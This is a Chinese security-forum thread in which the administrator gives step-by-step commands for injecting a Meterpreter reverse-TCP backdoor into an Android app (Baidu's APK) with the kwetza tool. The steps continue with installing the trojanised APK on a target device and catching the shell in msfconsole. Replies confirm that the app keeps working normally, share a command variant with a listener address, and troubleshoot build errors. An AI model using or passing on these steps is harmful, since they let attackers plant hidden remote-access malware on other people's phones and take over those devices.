搜索
查看: 4243|回复: 9

kali给APP添加shell

  [复制链接]

598

主题

876

帖子

2235

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2235

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-6-13 21:22:42 来自手机 | 显示全部楼层 |阅读模式
git clone [url=https://github.com/sensepost/kwetza]https://github.com/sensepost/kwetza[/url]
cd kwetza
python kwetza.py baidu.apk 监听者IP 监听端口 yes

#这里选取了百度的apk文件做测试
随便输入一个密码
得到新生成的apk文件
将注入完成的apk文件安装在目标设备
也可以本机
xdg-open baidu.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 监听者IP
set lport 监听端口
exploit

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复

使用道具 举报

83

主题

117

帖子

199

积分

注册会员

Rank: 2

积分
199
发表于 2019-6-17 08:48:52 来自手机 | 显示全部楼层
感谢分享!学习了!
回复 支持 反对

使用道具 举报

0

主题

34

帖子

76

积分

vip用户

Rank: 6Rank: 6

积分
76
发表于 2019-6-25 12:31:10 | 显示全部楼层
这个给APP安装了后门后,影响原APP的正常运行吗?
回复 支持 反对

使用道具 举报

598

主题

876

帖子

2235

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2235

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2019-6-25 14:56:07 来自手机 | 显示全部楼层
Richard 发表于 2019-6-25 04:31
这个给APP安装了后门后,影响原APP的正常运行吗?

不影响!
回复 支持 反对

使用道具 举报

0

主题

3

帖子

13

积分

新手开车

Rank: 1

积分
13
发表于 2019-7-21 15:33:36 | 显示全部楼层
本帖最后由 qwe 于 2019-7-21 15:37 编辑

是版本的原因吗,我只能这样执行
  1. python kwetza.py PokemonDuel.apk tcp 192.168.10.6 4444 yes AssistActivity
复制代码


回复 支持 反对

使用道具 举报

598

主题

876

帖子

2235

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2235

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2019-7-21 16:20:58 来自手机 | 显示全部楼层
qwe 发表于 2019-7-21 07:33
是版本的原因吗,我只能这样执行

发个图片我看看!
回复 支持 反对

使用道具 举报

0

主题

3

帖子

13

积分

新手开车

Rank: 1

积分
13
发表于 2019-7-23 20:42:44 | 显示全部楼层
本帖最后由 qwe 于 2019-7-23 20:53 编辑

必须要加https/tcp 后面加AssistActivity才可以

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复 支持 反对

使用道具 举报

598

主题

876

帖子

2235

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2235

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2019-7-24 15:39:39 来自手机 | 显示全部楼层
qwe 发表于 2019-7-23 12:42
必须要加https/tcp 后面加AssistActivity才可以

嗯嗯!
回复 支持 反对

使用道具 举报

0

主题

6

帖子

8

积分

新手开车

Rank: 1

积分
8

活跃会员

发表于 2020-7-27 11:20:04 | 显示全部楼层
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;

jarsigner 错误: java.lang.RuntimeException: 密钥库加载: Keystore was tampered with, or password was incorrect

这两个错误怎么解决呀
回复 支持 反对

使用道具 举报

598

主题

876

帖子

2235

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2235

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2020-7-27 12:46:18 | 显示全部楼层
bystart 发表于 2020-7-27 03:20
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuf ...

你换个APP试下,有的APP是加壳的,是没法添加后门的。
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
朕知道了
快速回复 返回顶部 返回列表